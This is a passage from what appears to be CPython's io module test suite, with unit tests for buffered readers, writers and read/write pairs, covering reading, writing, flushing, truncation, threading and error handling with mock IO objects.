refcounting is correct with some error conditions with self.assertRaisesRegex(ValueError, 'read/write/append mode'): self.open(FakePath(os_helper.TESTFN), 'rwxa') def test_RawIOBase_readall(self): # Exercise the default unlimited RawIOBase.read() and readall() # implementations. rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.read(), b"abcdefg") rawio = self.MockRawIOWithoutRead((b"abc", b"d", b"efg")) self.assertEqual(rawio.readall(), b"abcdefg") def test_BufferedIOBase_readinto(self): # Exercise the default BufferedIOBase.readinto() and readinto1() # implementations (which call read() or read1() internally). class Reader(self.BufferedIOBase): def __init__(self, avail): self.avail = avail def read(self, size): result = self.avail[:size] self.avail = self.avail[size:] return result def read1(self, size): """Returns no more than 5 bytes at once""" return self.read(min(size, 5)) tests = ( # (test method, total data available, read buffer size, expected # read size) ("readinto", 10, 5, 5), ("readinto", 10, 6, 6), # More than read1() can return ("readinto", 5, 6, 5), # Buffer larger than total available ("readinto", 6, 7, 6), ("readinto", 10, 0, 0), # Empty buffer ("readinto1", 10, 5, 5), # Result limited to single read1() call ("readinto1", 10, 6, 5), # Buffer larger than read1() can return ("readinto1", 5, 6, 5), # Buffer larger than total available ("readinto1", 6, 7, 5), ("readinto1", 10, 0, 0), # Empty buffer ) UNUSED_BYTE = 0x81 for test in tests: with self.subTest(test): method, avail, request, result = test reader = Reader(bytes(range(avail))) buffer = bytearray((UNUSED_BYTE,) * request) method = getattr(reader, method) self.assertEqual(method(buffer), result) self.assertEqual(len(buffer), request) self.assertSequenceEqual(buffer[:result], range(result)) unused = (UNUSED_BYTE,) * (request - result) self.assertSequenceEqual(buffer[result:], unused) self.assertEqual(len(reader.avail), avail - result) def test_close_assert(self): 
class R(self.IOBase): def __setattr__(self, name, value): pass def flush(self): raise OSError() f = R() # This would cause an assertion failure. self.assertRaises(OSError, f.close) # Silence destructor error R.flush = lambda self: None class CIOTest(IOTest): def test_IOBase_finalize(self): # Issue #12149: segmentation fault on _PyIOBase_finalize when both a # class which inherits IOBase and an object of this class are caught # in a reference cycle and close() is already in the method cache. class MyIO(self.IOBase): def close(self): pass # create an instance to populate the method cache MyIO() obj = MyIO() obj.obj = obj wr = weakref.ref(obj) del MyIO del obj support.gc_collect() self.assertIsNone(wr(), wr) class PyIOTest(IOTest): pass @support.cpython_only class APIMismatchTest(unittest.TestCase): def test_RawIOBase_io_in_pyio_match(self): """Test that pyio RawIOBase class has all c RawIOBase methods""" mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase, ignore=('__weakref__',)) self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods') def test_RawIOBase_pyio_in_io_match(self): """Test that c RawIOBase class has all pyio RawIOBase methods""" mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase) self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods') class CommonBufferedTests: # Tests common to BufferedReader, BufferedWriter and BufferedRandom def test_detach(self): raw = self.MockRawIO() buf = self.tp(raw) self.assertIs(buf.detach(), raw) self.assertRaises(ValueError, buf.detach) repr(buf) # Should still work def test_fileno(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertEqual(42, bufio.fileno()) def test_invalid_args(self): rawio = self.MockRawIO() bufio = self.tp(rawio) # Invalid whence self.assertRaises(ValueError, bufio.seek, 0, -1) self.assertRaises(ValueError, bufio.seek, 0, 9) def test_override_destructor(self): tp = self.tp record 
= [] class MyBufferedIO(tp): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() rawio = self.MockRawIO() bufio = MyBufferedIO(rawio) del bufio support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_context_manager(self): # Test usability as a context manager rawio = self.MockRawIO() bufio = self.tp(rawio) def _with(): with bufio: pass _with() # bufio should now be closed, and using it a second time should raise # a ValueError. self.assertRaises(ValueError, _with) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.tp(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) def test_repr(self): raw = self.MockRawIO() b = self.tp(raw) clsname = r"(%s\.)?%s" % (self.tp.__module__, self.tp.__qualname__) self.assertRegex(repr(b), "<%s>" % clsname) raw.name = "dummy" self.assertRegex(repr(b), "<%s name='dummy'>" % clsname) raw.name = b"dummy" self.assertRegex(repr(b), "<%s name=b'dummy'>" % clsname) def test_recursive_repr(self): # Issue #25455 raw = self.MockRawIO() b = self.tp(raw) with support.swap_attr(raw, 'name', b): try: repr(b) # Should not crash except RuntimeError: pass def test_flush_error_on_close(self): # Test that buffered file is closed despite failed flush # and that flush() is called before file closed. 
raw = self.MockRawIO() closed = [] def bad_flush(): closed[:] = [b.closed, raw.closed] raise OSError() raw.flush = bad_flush b = self.tp(raw) self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) self.assertTrue(raw.closed) self.assertTrue(closed) # flush() called self.assertFalse(closed[0]) # flush() called before file closed self.assertFalse(closed[1]) raw.flush = lambda: None # break reference loop def test_close_error_on_close(self): raw = self.MockRawIO() def bad_flush(): raise OSError('flush') def bad_close(): raise OSError('close') raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(OSError) as err: # exception not swallowed b.close() self.assertEqual(err.exception.args, ('close',)) self.assertIsInstance(err.exception.__context__, OSError) self.assertEqual(err.exception.__context__.args, ('flush',)) self.assertFalse(b.closed) # Silence destructor error raw.close = lambda: None b.flush = lambda: None def test_nonnormalized_close_error_on_close(self): # Issue #21677 raw = self.MockRawIO() def bad_flush(): raise non_existing_flush def bad_close(): raise non_existing_close raw.close = bad_close b = self.tp(raw) b.flush = bad_flush with self.assertRaises(NameError) as err: # exception not swallowed b.close() self.assertIn('non_existing_close', str(err.exception)) self.assertIsInstance(err.exception.__context__, NameError) self.assertIn('non_existing_flush', str(err.exception.__context__)) self.assertFalse(b.closed) # Silence destructor error b.flush = lambda: None raw.close = lambda: None def test_multi_close(self): raw = self.MockRawIO() b = self.tp(raw) b.close() b.close() b.close() self.assertRaises(ValueError, b.flush) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) def test_readonly_attributes(self): raw = self.MockRawIO() buf = self.tp(raw) x = 
self.MockRawIO() with self.assertRaises(AttributeError): buf.raw = x class SizeofTest: @support.cpython_only def test_sizeof(self): bufsize1 = 4096 bufsize2 = 8192 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize1) size = sys.getsizeof(bufio) - bufsize1 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize2) self.assertEqual(sys.getsizeof(bufio), size + bufsize2) @support.cpython_only def test_buffer_freeing(self) : bufsize = 4096 rawio = self.MockRawIO() bufio = self.tp(rawio, buffer_size=bufsize) size = sys.getsizeof(bufio) - bufsize bufio.close() self.assertEqual(sys.getsizeof(bufio), size) class BufferedReaderTest(unittest.TestCase, CommonBufferedTests): read_mode = "rb" def test_constructor(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(b"abc", bufio.read()) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) rawio = self.MockRawIO([b"abc"]) bufio.__init__(rawio) self.assertEqual(b"abc", bufio.read()) def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.read, 0) bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.read(0), b'') def test_read(self): for arg in (None, 7): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(arg)) # Invalid args self.assertRaises(ValueError, bufio.read, -2) def test_read1(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"b", bufio.read1(1)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"", bufio.read1(0)) 
self.assertEqual(b"c", bufio.read1(100)) self.assertEqual(rawio._reads, 1) self.assertEqual(b"d", bufio.read1(100)) self.assertEqual(rawio._reads, 2) self.assertEqual(b"efg", bufio.read1(100)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1(100)) self.assertEqual(rawio._reads, 4) def test_read1_arbitrary(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"a", bufio.read(1)) self.assertEqual(b"bc", bufio.read1()) self.assertEqual(b"d", bufio.read1()) self.assertEqual(b"efg", bufio.read1(-1)) self.assertEqual(rawio._reads, 3) self.assertEqual(b"", bufio.read1()) self.assertEqual(rawio._reads, 4) def test_readinto(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) b = bytearray(2) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"cd") self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ef") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"gf") self.assertEqual(bufio.readinto(b), 0) self.assertEqual(b, b"gf") rawio = self.MockRawIO((b"abc", None)) bufio = self.tp(rawio) self.assertEqual(bufio.readinto(b), 2) self.assertEqual(b, b"ab") self.assertEqual(bufio.readinto(b), 1) self.assertEqual(b, b"cb") def test_readinto1(self): buffer_size = 10 rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl")) bufio = self.tp(rawio, buffer_size=buffer_size) b = bytearray(2) self.assertEqual(bufio.peek(3), b'abc') self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"ab") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 1) self.assertEqual(b[:1], b"c") self.assertEqual(rawio._reads, 1) self.assertEqual(bufio.readinto1(b), 2) self.assertEqual(b, b"de") self.assertEqual(rawio._reads, 2) b = bytearray(2*buffer_size) self.assertEqual(bufio.peek(3), b'fgh') self.assertEqual(rawio._reads, 3) self.assertEqual(bufio.readinto1(b), 6) 
self.assertEqual(b[:6], b"fghjkl") self.assertEqual(rawio._reads, 4) def test_readinto_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readinto1_array(self): buffer_size = 60 data = b"a" * 26 rawio = self.MockRawIO((data,)) bufio = self.tp(rawio, buffer_size=buffer_size) # Create an array with element size > 1 byte b = array.array('i', b'x' * 32) assert len(b) != 16 # Read into it. We should get as many *bytes* as we can fit into b # (which is more than the number of elements) n = bufio.readinto1(b) self.assertGreater(n, len(b)) # Check that old contents of b are preserved bm = memoryview(b).cast('B') self.assertLess(n, len(bm)) self.assertEqual(bm[:n], data[:n]) self.assertEqual(bm[n:], b'x' * (len(bm[n:]))) def test_readlines(self): def bufio(): rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef")) return self.tp(rawio) self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"]) self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"]) self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"]) def test_buffering(self): data = b"abcdefghi" dlen = len(data) tests = [ [ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ], [ 100, [ 3, 3, 3], [ dlen ] ], [ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ], ] for bufsize, buf_read_sizes, raw_read_sizes in tests: rawio = self.MockFileIO(data) bufio = self.tp(rawio, buffer_size=bufsize) pos = 0 for nbytes in buf_read_sizes: self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes]) pos += nbytes # this is mildly 
implementation-dependent self.assertEqual(rawio.read_history, raw_read_sizes) def test_read_non_blocking(self): # Inject some None's in there to simulate EWOULDBLOCK rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None)) bufio = self.tp(rawio) self.assertEqual(b"abcd", bufio.read(6)) self.assertEqual(b"e", bufio.read(1)) self.assertEqual(b"fg", bufio.read()) self.assertEqual(b"", bufio.peek(1)) self.assertIsNone(bufio.read()) self.assertEqual(b"", bufio.read()) rawio = self.MockRawIO((b"a", None, None)) self.assertEqual(b"a", rawio.readall()) self.assertIsNone(rawio.readall()) def test_read_past_eof(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read(9000)) def test_read_all(self): rawio = self.MockRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertEqual(b"abcdefg", bufio.read()) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes with exactly the same number of 0's, # 1's... 255's. This will help us check that concurrent reading # doesn't duplicate or forget contents. 
N = 1000 l = list(range(256)) * N random.shuffle(l) s = bytes(bytearray(l)) with self.open(os_helper.TESTFN, "wb") as f: f.write(s) with self.open(os_helper.TESTFN, self.read_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] results = [] def f(): try: # Intra-buffer read then buffer-flushing read for n in cycle([1, 19]): s = bufio.read(n) if not s: break # list.append() is atomic results.append(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) s = b''.join(results) for i in range(256): c = bytes(bytearray([i])) self.assertEqual(s.count(c), N) finally: os_helper.unlink(os_helper.TESTFN) def test_unseekable(self): bufio = self.tp(self.MockUnseekableIO(b"A" * 10)) self.assertRaises(self.UnsupportedOperation, bufio.tell) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) bufio.read(1) self.assertRaises(self.UnsupportedOperation, bufio.seek, 0) self.assertRaises(self.UnsupportedOperation, bufio.tell) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) # Silence destructor error bufio.close = lambda: None def test_no_extraneous_read(self): # Issue #9550; when the raw IO object has satisfied the read request, # we should not issue any additional reads, otherwise it may block # (e.g. socket). bufsize = 16 for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2): rawio = self.MockRawIO([b"x" * n]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) # Simple case: one raw read is enough to satisfy the request. self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) # A more complex case where two raw reads are needed to satisfy # the request. 
rawio = self.MockRawIO([b"x" * (n - 1), b"x"]) bufio = self.tp(rawio, bufsize) self.assertEqual(bufio.read(n), b"x" * n) self.assertEqual(rawio._extraneous_reads, 0, "failed for {}: {} != 0".format(n, rawio._extraneous_reads)) def test_read_on_closed(self): # Issue #23796 b = io.BufferedReader(io.BytesIO(b"12")) b.read(1) b.close() self.assertRaises(ValueError, b.peek) self.assertRaises(ValueError, b.read1, 1) def test_truncate_on_read_only(self): rawio = self.MockFileIO(b"abc") bufio = self.tp(rawio) self.assertFalse(bufio.writable()) self.assertRaises(self.UnsupportedOperation, bufio.truncate) self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0) class CBufferedReaderTest(BufferedReaderTest, SizeofTest): tp = io.BufferedReader @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedReaderTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO([b"abc"]) bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.read) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.read) def test_misbehaved_io_read(self): rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg")) bufio = self.tp(rawio) # _pyio.BufferedReader seems to implement reading different, so that # checking this is not so easy. self.assertRaises(OSError, bufio.read, 10) def test_garbage_collection(self): # C BufferedReader objects are collected. 
# The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.f = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedReader"): self.tp(io.BytesIO(), 1024, 1024, 1024) def test_bad_readinto_value(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: -1 bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsNone(cm.exception.__cause__) def test_bad_readinto_type(self): rawio = io.BufferedReader(io.BytesIO(b"12")) rawio.readinto = lambda buf: b'' bufio = self.tp(rawio) with self.assertRaises(OSError) as cm: bufio.readline() self.assertIsInstance(cm.exception.__cause__, TypeError) class PyBufferedReaderTest(BufferedReaderTest): tp = pyio.BufferedReader class BufferedWriterTest(unittest.TestCase, CommonBufferedTests): write_mode = "wb" def test_constructor(self): rawio = self.MockRawIO() bufio = self.tp(rawio) bufio.__init__(rawio) bufio.__init__(rawio, buffer_size=1024) bufio.__init__(rawio, buffer_size=16) self.assertEqual(3, bufio.write(b"abc")) bufio.flush() self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) bufio.__init__(rawio) self.assertEqual(3, bufio.write(b"ghi")) bufio.flush() self.assertEqual(b"".join(rawio._write_stack), b"abcghi") def test_uninitialized(self): bufio = self.tp.__new__(self.tp) del bufio bufio = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', bufio.write, b'') bufio.__init__(self.MockRawIO()) self.assertEqual(bufio.write(b''), 0) def test_detach_flush(self): raw = 
self.MockRawIO() buf = self.tp(raw) buf.write(b"howdy!") self.assertFalse(raw._write_stack) buf.detach() self.assertEqual(raw._write_stack, [b"howdy!"]) def test_write(self): # Write to the buffered IO but don't overflow the buffer. writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") self.assertFalse(writer._write_stack) buffer = bytearray(b"def") bufio.write(buffer) buffer[:] = b"***" # Overwrite our copy of the data bufio.flush() self.assertEqual(b"".join(writer._write_stack), b"abcdef") def test_write_overflow(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) contents = b"abcdefghijklmnop" for n in range(0, len(contents), 3): bufio.write(contents[n:n+3]) flushed = b"".join(writer._write_stack) # At least (total - 8) bytes were implicitly flushed, perhaps more # depending on the implementation. self.assertTrue(flushed.startswith(contents[:-8]), flushed) def check_writes(self, intermediate_func): # Lots of writes, test the flushed output is as expected. contents = bytes(range(256)) * 1000 n = 0 writer = self.MockRawIO() bufio = self.tp(writer, 13) # Generator of write sizes: repeat each N 15 times then proceed to N+1 def gen_sizes(): for size in count(1): for i in range(15): yield size sizes = gen_sizes() while n < len(contents): size = min(next(sizes), len(contents) - n) self.assertEqual(bufio.write(contents[n:n+size]), size) intermediate_func(bufio) n += size bufio.flush() self.assertEqual(contents, b"".join(writer._write_stack)) def test_writes(self): self.check_writes(lambda bufio: None) def test_writes_and_flushes(self): self.check_writes(lambda bufio: bufio.flush()) def test_writes_and_seeks(self): def _seekabs(bufio): pos = bufio.tell() bufio.seek(pos + 1, 0) bufio.seek(pos - 1, 0) bufio.seek(pos, 0) self.check_writes(_seekabs) def _seekrel(bufio): pos = bufio.seek(0, 1) bufio.seek(+1, 1) bufio.seek(-1, 1) bufio.seek(pos, 0) self.check_writes(_seekrel) def test_writes_and_truncates(self): self.check_writes(lambda bufio: 
bufio.truncate(bufio.tell())) def test_write_non_blocking(self): raw = self.MockNonBlockWriterIO() bufio = self.tp(raw, 8) self.assertEqual(bufio.write(b"abcd"), 4) self.assertEqual(bufio.write(b"efghi"), 5) # 1 byte will be written, the rest will be buffered raw.block_on(b"k") self.assertEqual(bufio.write(b"jklmn"), 5) # 8 bytes will be written, 8 will be buffered and the rest will be lost raw.block_on(b"0") try: bufio.write(b"opqrwxyz0123456789") except self.BlockingIOError as e: written = e.characters_written else: self.fail("BlockingIOError should have been raised") self.assertEqual(written, 16) self.assertEqual(raw.pop_written(), b"abcdefghijklmnopqrwxyz") self.assertEqual(bufio.write(b"ABCDEFGHI"), 9) s = raw.pop_written() # Previously buffered bytes were flushed self.assertTrue(s.startswith(b"01234567A"), s) def test_write_and_rewind(self): raw = io.BytesIO() bufio = self.tp(raw, 4) self.assertEqual(bufio.write(b"abcdef"), 6) self.assertEqual(bufio.tell(), 6) bufio.seek(0, 0) self.assertEqual(bufio.write(b"XY"), 2) bufio.seek(6, 0) self.assertEqual(raw.getvalue(), b"XYcdef") self.assertEqual(bufio.write(b"123456"), 6) bufio.flush() self.assertEqual(raw.getvalue(), b"XYcdef123456") def test_flush(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") bufio.flush() self.assertEqual(b"abc", writer._write_stack[0]) def test_writelines(self): l = [b'ab', b'cd', b'ef'] writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_userlist(self): l = UserList([b'ab', b'cd', b'ef']) writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.writelines(l) bufio.flush() self.assertEqual(b''.join(writer._write_stack), b'abcdef') def test_writelines_error(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) self.assertRaises(TypeError, bufio.writelines, [1, 2, 3]) self.assertRaises(TypeError, bufio.writelines, None) 
self.assertRaises(TypeError, bufio.writelines, 'abc') def test_destructor(self): writer = self.MockRawIO() bufio = self.tp(writer, 8) bufio.write(b"abc") del bufio support.gc_collect() self.assertEqual(b"abc", writer._write_stack[0]) def test_truncate(self): # Truncate implicitly flushes the buffer. self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) bufio.write(b"abcdef") self.assertEqual(bufio.truncate(3), 3) self.assertEqual(bufio.tell(), 6) with self.open(os_helper.TESTFN, "rb", buffering=0) as f: self.assertEqual(f.read(), b"abc") def test_truncate_after_write(self): # Ensure that truncate preserves the file position after # writes longer than the buffer size. # Issue: https://bugs.python.org/issue32228 self.addCleanup(os_helper.unlink, os_helper.TESTFN) with self.open(os_helper.TESTFN, "wb") as f: # Fill with some buffer f.write(b'\x00' * 10000) buffer_sizes = [8192, 4096, 200] for buffer_size in buffer_sizes: with self.open(os_helper.TESTFN, "r+b", buffering=buffer_size) as f: f.write(b'\x00' * (buffer_size + 1)) # After write write_pos and write_end are set to 0 f.read(1) # read operation makes sure that pos != raw_pos f.truncate() self.assertEqual(f.tell(), buffer_size + 2) @support.requires_resource('cpu') def test_threads(self): try: # Write out many bytes from many threads and test they were # all flushed. N = 1000 contents = bytes(range(256)) * N sizes = cycle([1, 19]) n = 0 queue = deque() while n < len(contents): size = next(sizes) queue.append(contents[n:n+size]) n += size del contents # We use a real file object because it allows us to # exercise situations where the GIL is released before # writing the buffer to the raw streams. This is in addition # to concurrency issues due to switching threads in the middle # of Python code. 
with self.open(os_helper.TESTFN, self.write_mode, buffering=0) as raw: bufio = self.tp(raw, 8) errors = [] def f(): try: while True: try: s = queue.popleft() except IndexError: return bufio.write(s) except Exception as e: errors.append(e) raise threads = [threading.Thread(target=f) for x in range(20)] with threading_helper.start_threads(threads): time.sleep(0.02) # yield self.assertFalse(errors, "the following exceptions were caught: %r" % errors) bufio.close() with self.open(os_helper.TESTFN, "rb") as f: s = f.read() for i in range(256): self.assertEqual(s.count(bytes([i])), N) finally: os_helper.unlink(os_helper.TESTFN) def test_misbehaved_io(self): rawio = self.MisbehavedRawIO() bufio = self.tp(rawio, 5) self.assertRaises(OSError, bufio.seek, 0) self.assertRaises(OSError, bufio.tell) self.assertRaises(OSError, bufio.write, b"abcdef") # Silence destructor error bufio.close = lambda: None def test_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), 8, 12) def test_write_error_on_close(self): raw = self.MockRawIO() def bad_write(b): raise OSError() raw.write = bad_write b = self.tp(raw) b.write(b'spam') self.assertRaises(OSError, b.close) # exception not swallowed self.assertTrue(b.closed) def test_slow_close_from_thread(self): # Issue #31976 rawio = self.SlowFlushRawIO() bufio = self.tp(rawio, 8) t = threading.Thread(target=bufio.close) t.start() rawio.in_flush.wait() self.assertRaises(ValueError, bufio.write, b'spam') self.assertTrue(bufio.closed) t.join() class CBufferedWriterTest(BufferedWriterTest, SizeofTest): tp = io.BufferedWriter @unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing " "instead of returning NULL for malloc failure.") def test_constructor(self): BufferedWriterTest.test_constructor(self) # The allocation can succeed on 32-bit builds, e.g. with more # than 2 GiB RAM and a 64-bit kernel. 
if sys.maxsize > 0x7FFFFFFF: rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises((OverflowError, MemoryError, ValueError), bufio.__init__, rawio, sys.maxsize) def test_initialization(self): rawio = self.MockRawIO() bufio = self.tp(rawio) self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16) self.assertRaises(ValueError, bufio.write, b"def") self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1) self.assertRaises(ValueError, bufio.write, b"def") def test_garbage_collection(self): # C BufferedWriter objects are collected, and collecting them flushes # all data to disk. # The Python version has __del__, so it ends into gc.garbage instead self.addCleanup(os_helper.unlink, os_helper.TESTFN) with warnings_helper.check_warnings(('', ResourceWarning)): rawio = self.FileIO(os_helper.TESTFN, "w+b") f = self.tp(rawio) f.write(b"123xxx") f.x = f wr = weakref.ref(f) del f support.gc_collect() self.assertIsNone(wr(), wr) with self.open(os_helper.TESTFN, "rb") as f: self.assertEqual(f.read(), b"123xxx") def test_args_error(self): # Issue #17275 with self.assertRaisesRegex(TypeError, "BufferedWriter"): self.tp(io.BytesIO(), 1024, 1024, 1024) class PyBufferedWriterTest(BufferedWriterTest): tp = pyio.BufferedWriter class BufferedRWPairTest(unittest.TestCase): def test_constructor(self): pair = self.tp(self.MockRawIO(), self.MockRawIO()) self.assertFalse(pair.closed) def test_uninitialized(self): pair = self.tp.__new__(self.tp) del pair pair = self.tp.__new__(self.tp) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.read, 0) self.assertRaisesRegex((ValueError, AttributeError), 'uninitialized|has no attribute', pair.write, b'') pair.__init__(self.MockRawIO(), self.MockRawIO()) self.assertEqual(pair.read(0), b'') self.assertEqual(pair.write(b''), 0) def test_detach(self): pair = 
self.tp(self.MockRawIO(), self.MockRawIO()) self.assertRaises(self.UnsupportedOperation, pair.detach) def test_constructor_max_buffer_size_removal(self): with self.assertRaises(TypeError): self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12) def test_constructor_with_not_readable(self): class NotReadable(MockRawIO): def readable(self): return False self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO()) def test_constructor_with_not_writeable(self): class NotWriteable(MockRawIO): def writable(self): return False self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable()) def test_read(self): pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO()) self.assertEqual(pair.read(3), b"abc") self.assertEqual(pair.read(1), b"d") self.assertEqual(pair.read(), b"ef") pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO()) self.assertEqual(pair.read(None), b"abc") def test_readlines(self): pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO()) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"]) self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"]) def test_read1(self): # .read1() is delegated to the underlying reader object, so this test # can be shallow. 
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")

def test_readinto(self):
    """readinto()/readinto1() fill the given buffer from the reader side."""
